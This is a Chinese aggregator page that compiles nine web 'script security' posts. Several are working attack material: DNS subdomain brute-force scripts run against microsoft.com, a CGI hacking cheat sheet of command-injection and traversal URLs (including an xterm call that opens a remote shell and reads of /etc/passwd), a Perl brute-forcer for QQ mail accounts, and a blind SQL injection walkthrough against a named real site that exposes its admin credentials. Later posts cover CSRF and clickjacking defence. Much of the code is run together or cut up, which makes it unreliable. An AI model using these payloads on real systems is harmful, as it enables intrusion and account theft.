“NOMATTER”通过精心收集,向本站投稿了9篇DNS迭代穷举脚本脚本安全,下面小编为大家整理后的DNS迭代穷举脚本脚本安全,欢迎阅读与借鉴!

DNS迭代穷举脚本脚本安全

篇1:DNS迭代穷举脚本脚本安全

在普通的DNS穷举中,如果使用字典进行穷举,会发现没有哪个字典能穷举完所有的域名,国外安全研究者在常年累月的DNS记录收集中发现,很多域名有大量的短主机名,并且很易记,通常为4个字符或更少,所以有了以下脚本:

#!/usr/bin/env ruby### Brute code stolen form.: www.myhack58.com/#@domain='microsoft.com'defresult?(sub)results = %x(dig +noall #{sub}.#{@domain} +answer)ifresults !=“”puts“============================”puts“FOUND: \t#{sub}”puts“============================”puts“#{results}”puts“============================”end1==2enddefcrack_yielding(chars)crack_yield(chars){ |p|returnpifresult?(p)}enddefcrack_yield(chars)chars.each { |c|yieldc }  crack_yield(chars) { |c|chars.eachdo|x|yieldc + x      end  }endchars = ('a'..'z').to_a(0..9).each {|x|chars << x.to_s}crack_yielding(chars)

gist: www.myhack58.com/mubix/9107284

它能正常运行,但是速度比较慢,所以进行了改进,

#!/usr/bin/env ruby### Brute code stolen form.: gist.github.com/petehamilton/4755855#defresult?(sub)puts sub1==2enddefcrack_yielding(chars)crack_yield(chars){ |p|returnpifresult?(p)}enddefcrack_yield(chars)chars.each { |c|yieldc }  crack_yield(chars) { |c|chars.eachdo|x|yieldc + xend}endchars = ('a'..'z').to_a(0..9).each {|x|chars << x.to_s}crack_yielding(chars)

开始使用

ruby brutelist.rb | parallel -j100 dig +noall {}.microsoft.com +answer

工作回显如下所示:

c.microsoft.com.2IN  CNAME   c.microsoft.akadns.net.c.microsoft.akadns.net.499IN  A65.55.58.184e.microsoft.com.3599IN  A191.234.1.50g.microsoft.com.2798IN  CNAME   g.msn.com.g.msn.com.99IN  CNAME   g.msn.com.nsatc.net.g.msn.com.nsatc.net.148IN  A131.253.34.154i.microsoft.com.779IN  CNAME   i.toggle.www.ms.akadns.net.i.toggle.www.ms.akadns.net.44IN  CNAME   i.g.www.ms.akadns.net.i.g.www.ms.akadns.net.225IN  CNAME   i.microsoft.com.edgesuite.net.i.microsoft.com.edgesuite.net.116IN CNAME   a1475.g.akamai.net.a1475.g.akamai.net.16IN  A23.45.65.26a1475.g.akamai.net.16IN  A23.45.65.33m.microsoft.com.3599IN  CNAME   origin.mobile.ms.akadns.net.origin.mobile.ms.akadns.net.299IN   A65.55.186.235s.microsoft.com.3599IN  CNAME   reroute.microsoft.com.reroute.microsoft.com.3599IN  A65.55.58.201reroute.microsoft.com.3599IN  A64.4.11.37cs.microsoft.com.81IN  CNAME   wedcs.trafficmanager.net.wedcs.trafficmanager.net.7IN  CNAME   wedcseus.cloudapp.net.wedcseus.cloudapp.net.8IN  A137.116.48.250

篇2:关于defined脚本安全

很多php使用defined来防止外部直接访问php文件,从而保证了只让内部php文件include等调用,如下面:

//tag.php

if (!defined(“X”)) {

echo “You Cannot Access This Script. Directly, Have a Nice Day.”;

exit();

}

?>

这样的代码可以解决很多的安全问题,比如变量未定义[应该说在本文件内未定义]。

但是这样的在本地包含漏洞前就没什么意义了。比如进来看一代码

common.php文件里:

if ( !defined('X') )

{

die('Do not access this file directly.');

}

if ( !isset($root_path) )

{

$root_path = './';

}

require_once($root_path . 'config.php');

如果没有!defined('X') 的限制那么我们,这里$root_path未定义导致了一个远程包含,

而在改脚本又存在一个update-->include的2次攻击导致的本地包含,那么我们可以通过这个本地包含漏洞包含common.php导致突破!defined('X'),转化为远程包含。

篇3:CGI Hack脚本安全

总体思路,跳过限制,查看敏感文件和密码相关文件,写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着

cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权

感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们

注“

perl脚本的漏洞大多出在open()、system()或者 ''调用中。前者允许读写和执行,而后两个允许执行。

以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET

target.com/cgi-bin/home/news/sub.pl?12 随意构造

target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢

target.com/cgi-bin/home/news/sub.pl?`ls` 单引号

target.com/cgi-bin/home/news/sub.pl?`id`

target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`

target.com/cgi-bin/home/news/sub.pl?`cat<'/home1/siteadm/cgi-bin/home/news/sub.pl'` 非常好的思路,把代码cat回来显示

target.com/test.pl;ls|

target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|

target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|

target.com/test.pl?'id' 类似''内的操作和命令执行自己构造

比如:cat<'/home1/siteadm/cgi-bin/home/news/test.pl'` 把pl代码显示出来。

target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection

target.com/test.pl?&........ /../../etc/passwd

www.target.org/cgi-bin/club/scripts/userinfo.pl?user=./test 前面加./

www.target.org/cgi-bin/club/scripts/userinfo.pl?user=test%00 注意后面的 %00 别弄丢了

www.target.org/cgi-bin/club/scripts/userinfo.pl?user=../../../../etc/passwd%00

www.target.org/show.php?filename=../../../../../../../home/murong/include/config.php 查看php代码

www.target.org/show.php?filename=../../../../../../../home/murong/admin/global.php

emm和ps的一句话“

echo ”

www.target.org/cgi-bin/club/scripts/change_pw.pl?passwd0=1&passwd1=22&passwd2=22&key=../../../../../../../../bin/ls%20

>bbb%20|

www.target.org/cgi-bin/club/scripts\'less showpost.pl\' 并且寻找(用\'/\')\'SELECT\' 字符串

www.target.org/cgi-bin/club/scripts/..%c0%af../..%c0%af../bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征

www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin

相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法

DNS迭代穷举脚本脚本安全target.com/#cmd.exe

target.com/?dummyparam=xp_cmdshell

lynx target.com/cgi-bin/htmlscript?../../../../etc/passwd

PS:很久前整理asp注射和php注射大全都是私下给好友的,不知道哪个马甲不够意思,就发了出去,

现在满bbs和各动画站点都能看到,而且

作者乱七八糟, 幸亏吃亏以后,再整理或者写的其他文章技巧,只给几个特好的朋友。再也不敢乱发了,用pinke话说,“我写/发现个东西我

容易吗,不知道怎么就被人做成动画或者教程,拿来赚钱也罢了,还要留一句话,没什么技术,黑站就这么简单.” 鄙视这些人们……有本事你

们自己写个lcx,或者什么shell去?我写不来,但是用朋友的,我也心安理得

篇4:HWay && ServU.php脚本安全

利用Serv-U的本地权限提升漏洞自动安装Hway!即使服务器的Serv-U密码被更改,只要ServUAdmin.exe可读,它便能读出更改后的密码.此外HWay && Serv-U.php还具有本地端口扫描的功能.

如果服务器的Serv-U的端口,密码都没有更改,那么直接点击”安装Hway”便可安装成功.否则请点击“获取Serv-U的管理员密码和端口”尝试获取更改后Serv-U的管理员密码和端口.

详细用法看压缩包内图文说明,

HWay && ServU.php脚本安全

blogimg.chinaunix.net/blog/upfile2/080712123643.rar

篇5:邮箱爆破脚本脚本安全

#!/usr/bin/perl

use Net::POP3;

$email=“pop.qq.com”;

$pop = Net::POP3->new($email)or die(“ERROR: Unable to initiate. ”);

print $pop->banner;

$pop->quit;

$i=0;

open(fp1,“user.txt”);

@array1=;

open(fp2,“pass.txt”);

@array2=;

foreach $a(@array1) {

$u=substr($a,0,length($a)-1);

$u=$u.“\@qq.com”;

foreach $b(@array2) {

$p=substr($b,0,length($b)-1);

print “cracked with ”.$u.“-----”.$p.“\n”;

$i=$i+1;

$pop = Net::POP3->new($email)or die(“ERROR: Unable to initiate. ”);

$m=$pop->login($u,$p);

if($m>0)

{

print $u.“------------”.$p.“----”.“success”.“\n”;

$pop->quit;

}

else

{

print $u.“------------”.$p.“----”.“failed”.“\n”;

$pop->quit;

}

}

}

print $i;

篇6:手工注入脚本安全

现在注入工具横行,自动化的程度已经...不能再自动了.

很多人会熟练的使用啊D,明小子之类的自动注入工具.以为自己就会了...

注入的原理呢.什么是注入.为什么会造成注入.过程...等.

你知道吗?你有没有试过真正的手工注入?没吧.

现在就利用我写的手工注入工具来讲解一下总体手工注入过程.

先找个有注入漏洞的站.很简单满大街都是.

www.jinhu168.com/A3/NewsInfo.asp?id=75

manage_User

username  admin

password  bfpms

id  35

已经找好了.这是一个标准欠黑型网站.安全度就不用说了.

www.jinhu168.com/A3/NewsInfo.asp?id=75

有注入漏洞的地址.检查一下.

基本确定可能有漏洞.继续.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and exists (select * from manage_User)

查询manage_User这个表名是否存在.

不好意思.这工具老出错...录制这个工具不怎么好用.有好用的有空介绍个啊....

好了继续.

manage_User 存在...页面返回正常...

名字改了下`不存在就返回错误的页面`

这里是给你填写提示语句用的`不用的话清空就行了.

继续.

返回正常.说明存在.继续.等等`听电话`

不好意思.

不是1位哦`回显错误.呵呵`5位的`回显正常`

这样我们就知道 他很多东西了`表..项..还有内容长度.

帐号的第一位的第一个字母不是1所以出错.

呵呵`帐号的第一位的第一个字母是a 正确...所以回显正常.

帐号是什么我想都不用怎么想了吧`5位数的admin

确实是的哦....哈哈.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and 1=(select count(*) from [manage_User] where left(username,5)='admin')

为了给大家学习.我把例句都提取出来了.和程序过程是一样的,大家可以研究下.

其他的密码等也是这种过程. 大家明白了吗?要难不是很难`只是要有耐心.如果简单的话就不会出现

全自动的注入工具了.

希望大家在使用我的工具的同时也能学到点东西.

篇7:shell脚本加密脚本安全

第一种方法(gzexe):

这种加密方式不是非常保险的方法,但是能够满足一般的加密用途,可以隐蔽脚本中的密码等信息,

它是使用系统自带的gzexe程序,它不但加密,同时压缩文件。

使用方法:

gzexe file.sh

它会把原来没有加密的文件备份为 file.sh~ ,同时 file.sh 即被变成加密文件;

第二种方法(shc):

使用 shc 对 Linux shell 脚本加密.

shc是一个专业的加密shell脚本的工具.它的作用是把shell脚本转换为一个可执行的二进制文件,这个办法很好的解决了脚本中含有IP、密码等不希望公开的问题.

shc的下载地址:

点击下载

安装:

tar xzvf shc-3.8.6.tgz

cd shc-3.8.6

mkdir -p /usr/local/man/man1

这步是必须的,不然安装过程中会报错,shc将安装命令到/usr/local/bin/目录下;将帮助文档存放在/usr/local/man/man1/目录下,如果系统中无此目录,安装时会报错,可创建此目录后再执行安装

make install

这是要回答yes或者y,不能直接回车,否则会报错

使用方法:

“-f”选项指定需要加密的程序

shc -r -f script-name

运行后会生成两个文件,script-name.x 和 script-name.x.c. 其中script-name.x是加密后的可执行的二进制文件;用./script-name即可运行,script-name.x.c是生成script-name.x的原文件(c语言).

另shc还提供了一种设定有效执行期限的方法,可以首先使用shc将shell程序转化为二进制,并加上过期时间,如:

# shc -e 18/10/ -m “ It’s too late to run this script. ” -f script.s

篇8:猥琐的notclickjacking脚本安全

很猥琐的submitjacking,在群里看到的,应该不是owasp里提到的clickjacking,但也挺有意思,OWASP会议上的Clickjacking可以看看刺写的OWASP会议上的Clickjacking。

XML/HTML代码

onSubmit=window.open(“www.example.com”)>

style=“position:absolute;left:0px;visibility:hidden;”/>

onMouseUp=document.getElementById('my_submit_button_tres').click>Fake

link (onmouseup and click)

可参见www.planb-security.net/notclickjacking/

篇9:说一说CSRF漏洞脚本安全

CSRF漏洞(Cross-Site Request Forgery),是Web应用中常见的一种攻击方法,存在被CSRF攻击可能的站点,就存在CSRF漏洞,

先举例说明

在一个论坛上,Alice发了一个帖子,Eve回复了她的帖子,以下面的方式上传了一张图片:

Eve: Hello Alice! Look here:

我们看链接的地址,是将1000000 USD从Alice的帐户转到Eve的帐户。

如果Alice点了上面图片的链接,那么链接的地址会被在浏览器中执行,如果浏览器中保存了用户登录的cookie且未过期,那么链接就会被执行成功,结果就是Alice的1000000 USD被转给Eve了。

当然,实际上银行的网站不会这么傻,这里只是一个例子,

从例子中我们可以看出CSRF攻击的主要特征:

网站提供了有“副作用”的URL,所谓的“副作用”,是指会对用户的利益,隐私造成影响的URL,比如例子中转帐的URL。

浏览器的cookie保存了用户登录鉴权信息。

所以,知道了CSRF的特征之后,我们也可以知道如何防御CSRF攻击了,主要有下面几个手段:

不提供有“副作用”的URL。

如果URL是通过表单(form)提交的,那么在服务器生成form时候,增加一个随即数作为隐藏属性,让form提交的时候,检查客户端发送的随机数与服务器的随机数是否一致,如果不一致,那么就拒绝请求。

检查HTTP请求中的referrer header属性,(referrer header是表示请求来源地址的,比如image请求的referrer header一般是HTML页面),通过白名单的方式,检查特定的referrer header地址才允许访问。但是referrer header属性涉及到用户隐私问题,一般浏览器都提供了禁用referrer header属性的功能。所以不推荐使用。

阅读剩余 0%
本站所有文章资讯、展示的图片素材等内容均为注册用户上传(部分报媒/平媒内容转载自网络合作媒体),仅供学习参考。 用户通过本站上传、发布的任何内容的知识产权归属用户或原始著作权人所有。如有侵犯您的版权,请联系我们反馈本站将在三个工作日内改正。